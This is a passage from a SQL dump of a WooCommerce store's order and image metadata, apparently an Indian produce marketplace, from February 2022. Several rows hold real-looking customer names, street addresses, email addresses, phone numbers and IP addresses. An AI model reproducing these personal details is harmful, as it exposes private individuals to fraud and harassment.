India'),(3443,998,'_wcfmmp_user_location_lat','12.9116225'),(3444,998,'_wcfmmp_user_location_lng','77.6388622'),(3445,998,'_wcfmmp_order_processed','yes'),(3446,998,'_transaction_id','pay_Iz2RgiWHkOIe4l'),(3447,998,'_date_paid','1645529332'),(3448,998,'_paid_date','2022-02-22 16:58:52'),(3449,998,'_download_permissions_granted','yes'),(3450,998,'_recorded_sales','yes'),(3451,998,'_recorded_coupon_usage_counts','yes'),(3452,998,'_order_stock_reduced','yes'),(3453,998,'_wcfm_new_order_notified','yes'),(3454,998,'_wcfm_membership_order_processed','yes'),(3455,998,'_new_order_email_sent','true'),(3456,998,'_wcfmmp_order_email_triggered','yes'),(3457,999,'_wp_attached_file','2022/02/mango-fruit-isolated-white-background-39063419.jpg'),(3458,999,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:800;s:6:\"height\";i:563;s:4:\"file\";s:58:\"2022/02/mango-fruit-isolated-white-background-39063419.jpg\";s:8:\"filesize\";i:44036;s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:58:\"mango-fruit-isolated-white-background-39063419-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18995;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:58:\"mango-fruit-isolated-white-background-39063419-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6015;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:56:\"mango-fruit-isolated-white-background-39063419-50x35.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:35;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4145;}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"mango-fruit-isolated-white-background-39063419-300x211.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:211;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"mango-fruit-isolated-white-background-39063419-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"mango-fruit-isolated-white-background-39063419-768x540.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:540;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:58:\"mango-fruit-isolated-white-background-39063419-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:58:\"mango-fruit-isolated-white-background-39063419-600x422.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:422;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:58:\"mango-fruit-isolated-white-background-39063419-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:56:\"mango-fruit-isolated-white-background-39063419-48x34.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:34;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:56:\"mango-fruit-isolated-white-background-39063419-48x34.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:34;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3518,1002,'_order_key','wc_order_rfidsixWomwhi'),(3519,1002,'_customer_user','21'),(3520,1002,'_payment_method','razorpay'),(3521,1002,'_payment_method_title','Credit Card/Debit Card/NetBanking'),(3522,1002,'_customer_ip_address','122.167.88.3'),(3523,1002,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36'),(3524,1002,'_created_via','checkout'),(3525,1002,'_cart_hash','199a8744cba42200a44d81c8eeaf79a3'),(3526,1002,'_billing_first_name','bavani'),(3527,1002,'_billing_last_name','p'),(3528,1002,'_billing_address_1','800 ,spandana towers'),(3529,1002,'_billing_address_2','hsr layout'),(3530,1002,'_billing_city','bangalore'),(3531,1002,'_billing_state','KA'),(3532,1002,'_billing_postcode','560102'),(3533,1002,'_billing_country','IN'),(3534,1002,'_billing_email','bhavani@utfindia.in'),(3535,1002,'_billing_phone','7412435646'),(3536,1002,'_shipping_first_name','bavani'),(3537,1002,'_shipping_last_name','p'),(3538,1002,'_shipping_address_1','800 ,spandana towers'),(3539,1002,'_shipping_address_2','hsr layout'),(3540,1002,'_shipping_city','bangalore'),(3541,1002,'_shipping_state','KA'),(3542,1002,'_shipping_postcode','560102'),(3543,1002,'_shipping_country','IN'),(3544,1002,'_order_currency','INR'),(3545,1002,'_cart_discount','0'),(3546,1002,'_cart_discount_tax','0'),(3547,1002,'_order_shipping','25'),(3548,1002,'_order_shipping_tax','0'),(3549,1002,'_order_tax','0'),(3550,1002,'_order_total','425.00'),(3551,1002,'_order_version','6.2.1'),(3552,1002,'_prices_include_tax','no'),(3553,1002,'_billing_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560102 IN bhavani@utfindia.in 7412435646'),(3554,1002,'_shipping_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560102 IN '),(3555,1002,'is_vat_exempt','no'),(3556,1002,'_wcfmmp_order_processed','yes'),(3557,1002,'_transaction_id','pay_Izj6F6Laq0MMPh'),(3558,1002,'_date_paid','1645679552'),(3559,1002,'_paid_date','2022-02-24 10:42:32'),(3560,1002,'_download_permissions_granted','yes'),(3561,1002,'_recorded_sales','yes'),(3562,1002,'_recorded_coupon_usage_counts','yes'),(3563,1002,'_order_stock_reduced','yes'),(3564,1002,'_wcfm_new_order_notified','yes'),(3565,1002,'_wcfm_membership_order_processed','yes'),(3566,1002,'_new_order_email_sent','true'),(3567,1002,'_wcfmmp_order_email_triggered','yes'),(3568,1002,'_date_completed','1645679822'),(3569,1002,'_completed_date','2022-02-24 10:47:02'),(3570,1003,'_wp_attached_file','2022/02/mango-fruit-isolated-white-background-39063419-1.jpg'),(3571,1003,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:800;s:6:\"height\";i:563;s:4:\"file\";s:60:\"2022/02/mango-fruit-isolated-white-background-39063419-1.jpg\";s:8:\"filesize\";i:44036;s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:60:\"mango-fruit-isolated-white-background-39063419-1-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18995;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:60:\"mango-fruit-isolated-white-background-39063419-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6015;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:58:\"mango-fruit-isolated-white-background-39063419-1-50x35.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:35;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4145;}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"mango-fruit-isolated-white-background-39063419-1-300x211.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:211;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"mango-fruit-isolated-white-background-39063419-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:60:\"mango-fruit-isolated-white-background-39063419-1-768x540.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:540;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:60:\"mango-fruit-isolated-white-background-39063419-1-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:60:\"mango-fruit-isolated-white-background-39063419-1-600x422.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:422;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:60:\"mango-fruit-isolated-white-background-39063419-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:58:\"mango-fruit-isolated-white-background-39063419-1-48x34.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:34;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:58:\"mango-fruit-isolated-white-background-39063419-1-48x34.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:34;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3600,1005,'_order_key','wc_order_fNOSTBOF3n01D'),(3601,1005,'_customer_user','20'),(3602,1005,'_payment_method','razorpay'),(3603,1005,'_payment_method_title','Credit Card/Debit Card/NetBanking'),(3604,1005,'_customer_ip_address','27.7.143.76'),(3605,1005,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36'),(3606,1005,'_created_via','checkout'),(3607,1005,'_cart_hash','0f756eca0d7e48a4b2d587745a967e43'),(3608,1005,'_billing_first_name','pavithra'),(3609,1005,'_billing_last_name','g'),(3610,1005,'_billing_address_1','#800 Spandana towers , 19th main road .hsr layout 2nd sector'),(3611,1005,'_billing_address_2','near golden fresh super market'),(3612,1005,'_billing_city','bangalore'),(3613,1005,'_billing_state','KA'),(3614,1005,'_billing_postcode','560102'),(3615,1005,'_billing_country','IN'),(3616,1005,'_billing_email','Pavitra@utfindia.in'),(3617,1005,'_billing_phone','07411722844'),(3618,1005,'_shipping_first_name','pavithra'),(3619,1005,'_shipping_last_name','g'),(3620,1005,'_shipping_address_1','#800 Spandana towers , 19th main road .hsr layout 2nd sector'),(3621,1005,'_shipping_address_2','near golden fresh super market'),(3622,1005,'_shipping_city','bangalore'),(3623,1005,'_shipping_state','KA'),(3624,1005,'_shipping_postcode','560102'),(3625,1005,'_shipping_country','IN'),(3626,1005,'_order_currency','INR'),(3627,1005,'_cart_discount','0'),(3628,1005,'_cart_discount_tax','0'),(3629,1005,'_order_shipping','50'),(3630,1005,'_order_shipping_tax','0'),(3631,1005,'_order_tax','0'),(3632,1005,'_order_total','382.00'),(3633,1005,'_order_version','6.2.1'),(3634,1005,'_prices_include_tax','no'),(3635,1005,'_billing_address_index','pavithra g  #800 Spandana towers , 19th main road .hsr layout 2nd sector near golden fresh super market bangalore KA 560102 IN Pavitra@utfindia.in 07411722844'),(3636,1005,'_shipping_address_index','pavithra g  #800 Spandana towers , 19th main road .hsr layout 2nd sector near golden fresh super market bangalore KA 560102 IN '),(3637,1005,'is_vat_exempt','no'),(3638,1005,'_wcfmmp_order_processed','yes'),(3639,1005,'_transaction_id','pay_Izo835IspjaoPi'),(3640,1005,'_date_paid','1645697254'),(3641,1005,'_paid_date','2022-02-24 15:37:34'),(3642,1005,'_download_permissions_granted','yes'),(3643,1005,'_recorded_sales','yes'),(3644,1005,'_recorded_coupon_usage_counts','yes'),(3645,1005,'_order_stock_reduced','yes'),(3646,1005,'_wcfm_new_order_notified','yes'),(3647,1005,'_wcfm_membership_order_processed','yes'),(3648,1005,'_new_order_email_sent','true'),(3649,1005,'_wcfmmp_order_email_triggered','yes'),(3676,10,'_edit_lock','1646739383:1'),(3677,10,'_edit_last','1'),(3678,10,'_aioseo_title',NULL),(3679,10,'_aioseo_description',NULL),(3680,10,'_aioseo_keywords',''),(3681,10,'_aioseo_og_title',NULL),(3682,10,'_aioseo_og_description',NULL),(3683,10,'_aioseo_og_article_section',''),(3684,10,'_aioseo_og_article_tags',''),(3685,10,'_aioseo_twitter_title',NULL),(3686,10,'_aioseo_twitter_description',NULL),(3687,1008,'_order_key','wc_order_jCBSPE7dq8vqj'),(3688,1008,'_customer_user','21'),(3689,1008,'_payment_method','razorpay'),(3690,1008,'_payment_method_title','Credit Card/Debit Card/NetBanking'),(3691,1008,'_customer_ip_address','122.167.88.3'),(3692,1008,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36'),(3693,1008,'_created_via','checkout'),(3694,1008,'_cart_hash','bf8bc6f5f0503fe25226444554d3a335'),(3695,1008,'_billing_first_name','bavani'),(3696,1008,'_billing_last_name','p'),(3697,1008,'_billing_address_1','800 ,spandana towers'),(3698,1008,'_billing_address_2','hsr layout'),(3699,1008,'_billing_city','bangalore'),(3700,1008,'_billing_state','KA'),(3701,1008,'_billing_postcode','560102'),(3702,1008,'_billing_country','IN'),(3703,1008,'_billing_email','bhavani@utfindia.in'),(3704,1008,'_billing_phone','7412435646'),(3705,1008,'_shipping_first_name','bavani'),(3706,1008,'_shipping_last_name','p'),(3707,1008,'_shipping_address_1','800 ,spandana towers'),(3708,1008,'_shipping_address_2','hsr layout'),(3709,1008,'_shipping_city','bangalore'),(3710,1008,'_shipping_state','KA'),(3711,1008,'_shipping_postcode','560102'),(3712,1008,'_shipping_country','IN'),(3713,1008,'_order_currency','INR'),(3714,1008,'_cart_discount','0'),(3715,1008,'_cart_discount_tax','0'),(3716,1008,'_order_shipping','50'),(3717,1008,'_order_shipping_tax','0'),(3718,1008,'_order_tax','0'),(3719,1008,'_order_total','318.00'),(3720,1008,'_order_version','6.2.1'),(3721,1008,'_prices_include_tax','no'),(3722,1008,'_billing_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560102 IN bhavani@utfindia.in 7412435646'),(3723,1008,'_shipping_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560102 IN '),(3724,1008,'is_vat_exempt','no'),(3725,1008,'_wcfmmp_order_processed','yes'),(3726,1008,'_transaction_id','pay_J06T3yGYa8V5EG'),(3727,1008,'_date_paid','1645761837'),(3728,1008,'_paid_date','2022-02-25 09:33:57'),(3729,1008,'_download_permissions_granted','yes'),(3730,1008,'_recorded_sales','yes'),(3731,1008,'_recorded_coupon_usage_counts','yes'),(3732,1008,'_order_stock_reduced','yes'),(3733,1008,'_wcfm_new_order_notified','yes'),(3734,1008,'_wcfm_membership_order_processed','yes'),(3735,1008,'_new_order_email_sent','true'),(3736,1008,'_wcfmmp_order_email_triggered','yes'),(3737,1009,'_wp_attached_file','2022/02/mango-fruit-isolated-white-background-39063419-2.jpg'),(3738,1009,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:800;s:6:\"height\";i:563;s:4:\"file\";s:60:\"2022/02/mango-fruit-isolated-white-background-39063419-2.jpg\";s:8:\"filesize\";i:44036;s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:60:\"mango-fruit-isolated-white-background-39063419-2-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18995;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:60:\"mango-fruit-isolated-white-background-39063419-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6015;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:58:\"mango-fruit-isolated-white-background-39063419-2-50x35.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:35;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4145;}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"mango-fruit-isolated-white-background-39063419-2-300x211.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:211;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"mango-fruit-isolated-white-background-39063419-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:60:\"mango-fruit-isolated-white-background-39063419-2-768x540.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:540;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:60:\"mango-fruit-isolated-white-background-39063419-2-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:60:\"mango-fruit-isolated-white-background-39063419-2-600x422.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:422;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:60:\"mango-fruit-isolated-white-background-39063419-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:58:\"mango-fruit-isolated-white-background-39063419-2-48x34.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:34;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:58:\"mango-fruit-isolated-white-background-39063419-2-48x34.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:34;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_thumbnail_preview\";a:4:{s:4:\"file\";s:60:\"mango-fruit-isolated-white-background-39063419-2-320x384.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:384;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3739,1010,'_tc_votes','0'),(3740,1010,'_tc_rate','0'),(3741,1010,'_tc_views','33'),(3742,1010,'_thumbnail_id','1009'),(3743,1012,'_order_key','wc_order_zUtKLNUthntiH'),(3744,1012,'_customer_user','21'),(3745,1012,'_payment_method','razorpay'),(3746,1012,'_payment_method_title','Credit Card/Debit Card/NetBanking'),(3747,1012,'_customer_ip_address','122.167.88.3'),(3748,1012,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36'),(3749,1012,'_created_via','checkout'),(3750,1012,'_cart_hash','d09057f937c41f5104023db63bc54f18'),(3751,1012,'_billing_first_name','bavani'),(3752,1012,'_billing_last_name','p'),(3753,1012,'_billing_address_1','800 ,spandana towers'),(3754,1012,'_billing_address_2','hsr layout'),(3755,1012,'_billing_city','bangalore'),(3756,1012,'_billing_state','KA'),(3757,1012,'_billing_postcode','560102'),(3758,1012,'_billing_country','IN'),(3759,1012,'_billing_email','bhavani@utfindia.in'),(3760,1012,'_billing_phone','7412435646'),(3761,1012,'_shipping_first_name','bavani'),(3762,1012,'_shipping_last_name','p'),(3763,1012,'_shipping_address_1','800 ,spandana towers'),(3764,1012,'_shipping_address_2','hsr layout'),(3765,1012,'_shipping_city','bangalore'),(3766,1012,'_shipping_state','KA'),(3767,1012,'_shipping_postcode','560102'),(3768,1012,'_shipping_country','IN'),(3769,1012,'_order_currency','INR'),(3770,1012,'_cart_discount','0'),(3771,1012,'_cart_discount_tax','0'),(3772,1012,'_order_shipping','0'),(3773,1012,'_order_shipping_tax','0'),(3774,1012,'_order_tax','0'),(3775,1012,'_order_total','680.00'),(3776,1012,'_order_version','6.2.1'),(3777,1012,'_prices_include_tax','no'),(3778,1012,'_billing_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560102 IN bhavani@utfindia.in 7412435646'),(3779,1012,'_shipping_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560102 IN '),(3780,1012,'is_vat_exempt','no'),(3781,1012,'_wcfmmp_order_processed','yes'),(3782,1012,'_transaction_id','pay_J084RepJ7qDkWk'),(3783,1012,'_date_paid','1645767482'),(3784,1012,'_paid_date','2022-02-25 11:08:02'),(3785,1012,'_download_permissions_granted','yes'),(3786,1012,'_recorded_sales','yes'),(3787,1012,'_recorded_coupon_usage_counts','yes'),(3788,1012,'_order_stock_reduced','yes'),(3789,1012,'_wcfm_new_order_notified','yes'),(3790,1012,'_wcfm_membership_order_processed','yes'),(3791,1012,'_new_order_email_sent','true'),(3792,1012,'_wcfmmp_order_email_triggered','yes'),(3793,1012,'_date_completed','1645768868'),(3794,1012,'_completed_date','2022-02-25 11:31:08'),(3795,654,'_wc_cancel_additional_txt',''),(3796,1008,'_wc_cancel_additional_txt','gdfgdf'),(3797,1013,'_order_key','wc_order_off2xn0U5zAGB'),(3798,1013,'_customer_user','21'),(3799,1013,'_payment_method','razorpay'),(3800,1013,'_payment_method_title','Credit Card/Debit Card/NetBanking'),(3801,1013,'_customer_ip_address','122.167.88.3'),(3802,1013,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36'),(3803,1013,'_created_via','checkout'),(3804,1013,'_cart_hash','7961791996a450fc499907947e1cf603'),(3805,1013,'_billing_first_name','bavani'),(3806,1013,'_billing_last_name','p'),(3807,1013,'_billing_address_1','800 ,spandana towers'),(3808,1013,'_billing_address_2','hsr layout'),(3809,1013,'_billing_city','bangalore'),(3810,1013,'_billing_state','KA'),(3811,1013,'_billing_postcode','560102'),(3812,1013,'_billing_country','IN'),(3813,1013,'_billing_email','bhavani@utfindia.in'),(3814,1013,'_billing_phone','7412435646'),(3815,1013,'_shipping_first_name','bavani'),(3816,1013,'_shipping_last_name','p'),(3817,1013,'_shipping_address_1','800 ,spandana towers'),(3818,1013,'_shipping_address_2','hsr layout'),(3819,1013,'_shipping_city','bangalore'),(3820,1013,'_shipping_state','KA'),(3821,1013,'_shipping_postcode','560102'),(3822,1013,'_shipping_country','IN'),(3823,1013,'_order_currency','INR'),(3824,1013,'_cart_discount','0'),(3825,1013,'_cart_discount_tax','0'),(3826,1013,'_order_shipping','25'),(3827,1013,'_order_shipping_tax','0'),(3828,1013,'_order_tax','0'),(3829,1013,'_order_total','165.00'),(3830,1013,'_order_version','6.2.1'),(3831,1013,'_prices_include_tax','no'),(3832,1013,'_billing_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560102 IN bhavani@utfindia.in 7412435646'),(3833,1013,'_shipping_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560102 IN '),(3834,1013,'is_vat_exempt','no'),(3835,1013,'_wc_cancel_key','383469efd65d99931f6ac86d65c842ba'),(3836,1013,'_wcfmmp_order_processed','yes'),(3837,1013,'_transaction_id','pay_J092EJa6DZLNo7'),(3838,1013,'_date_paid','1645770878'),(3839,1013,'_paid_date','2022-02-25 12:04:38'),(3840,1013,'_download_permissions_granted','yes'),(3841,1013,'_recorded_sales','yes'),(3842,1013,'_recorded_coupon_usage_counts','no'),(3843,1013,'_order_stock_reduced','no'),(3844,1013,'_wcfm_new_order_notified','yes'),(3845,1013,'_wcfm_membership_order_processed','yes'),(3846,1013,'_new_order_email_sent','true'),(3847,1013,'_wcfmmp_order_email_triggered','yes'),(3848,1013,'_wc_cancel_additional_txt',''),(3849,1013,'_date_completed','1645771206'),(3850,1013,'_completed_date','2022-02-25 12:10:06'),(3851,1016,'_order_key','wc_order_BXNttBuG5eahJ'),(3852,1016,'_customer_user','21'),(3853,1016,'_payment_method','razorpay'),(3854,1016,'_payment_method_title','Credit Card/Debit Card/NetBanking'),(3855,1016,'_customer_ip_address','122.167.88.3'),(3856,1016,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36'),(3857,1016,'_created_via','checkout'),(3858,1016,'_cart_hash','ab1be4ba1f60dc0ff6894f5d25555ad4'),(3859,1016,'_billing_first_name','bavani'),(3860,1016,'_billing_last_name','p'),(3861,1016,'_billing_address_1','800 ,spandana towers'),(3862,1016,'_billing_address_2','hsr layout'),(3863,1016,'_billing_city','bangalore'),(3864,1016,'_billing_state','KA'),(3865,1016,'_billing_postcode','560102'),(3866,1016,'_billing_country','IN'),(3867,1016,'_billing_email','bhavani@utfindia.in'),(3868,1016,'_billing_phone','7412435646'),(3869,1016,'_shipping_first_name','bavani'),(3870,1016,'_shipping_last_name','p'),(3871,1016,'_shipping_address_1','800 ,spandana towers'),(3872,1016,'_shipping_address_2','hsr layout'),(3873,1016,'_shipping_city','bangalore'),(3874,1016,'_shipping_state','KA'),(3875,1016,'_shipping_postcode','560102'),(3876,1016,'_shipping_country','IN'),(3877,1016,'_order_currency','INR'),(3878,1016,'_cart_discount','0'),(3879,1016,'_cart_discount_tax','0'),(3880,1016,'_order_shipping','25'),(3881,1016,'_order_shipping_tax','0'),(3882,1016,'_order_tax','0'),(3883,1016,'_order_total','1307.00'),(3884,1016,'_order_version','6.2.1'),(3885,1016,'_prices_include_tax','no'),(3886,1016,'_billing_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560102 IN bhavani@utfindia.in 7412435646'),(3887,1016,'_shipping_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560102 IN '),(3889,1016,'_wc_cancel_key','b3c3cec293d8acb17d15adfa7c35a45f'),(3890,1016,'_wcfmmp_order_processed','yes'),(3892,1016,'is_vat_exempt','no'),(3893,1016,'_transaction_id','pay_J0DqvHNn5UsmYY'),(3894,1016,'_date_paid','1645787844'),(3895,1016,'_paid_date','2022-02-25 16:47:24'),(3896,1016,'_download_permissions_granted','yes'),(3897,1016,'_recorded_sales','yes'),(3898,1016,'_recorded_coupon_usage_counts','yes'),(3899,1016,'_order_stock_reduced','yes'),(3900,1016,'_wcfm_new_order_notified','yes'),(3901,1016,'_wcfm_membership_order_processed','yes'),(3902,1016,'_new_order_email_sent','true'),(3903,1016,'_wcfmmp_order_email_triggered','yes'),(3904,1016,'_date_completed','1645788084'),(3905,1016,'_completed_date','2022-02-25 16:51:24'),(3906,1017,'_order_key','wc_order_ZnxFTriyRG1us'),(3907,1017,'_customer_user','21'),(3908,1017,'_payment_method','razorpay'),(3909,1017,'_payment_method_title','Credit Card/Debit Card/NetBanking'),(3910,1017,'_customer_ip_address','122.167.88.3'),(3911,1017,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36'),(3912,1017,'_created_via','checkout'),(3913,1017,'_cart_hash','e42e86e564c7954abef0f3719da945a0'),(3914,1017,'_billing_first_name','bavani'),(3915,1017,'_billing_last_name','p'),(3916,1017,'_billing_address_1','800 ,spandana towers'),(3917,1017,'_billing_address_2','hsr layout'),(3918,1017,'_billing_city','bangalore'),(3919,1017,'_billing_state','KA'),(3920,1017,'_billing_postcode','560102'),(3921,1017,'_billing_country','IN'),(3922,1017,'_billing_email','bhavani@utfindia.in'),(3923,1017,'_billing_phone','7412435646'),(3924,1017,'_shipping_first_name','bavani'),(3925,1017,'_shipping_last_name','p'),(3926,1017,'_shipping_address_1','800 ,spandana towers'),(3927,1017,'_shipping_address_2','hsr 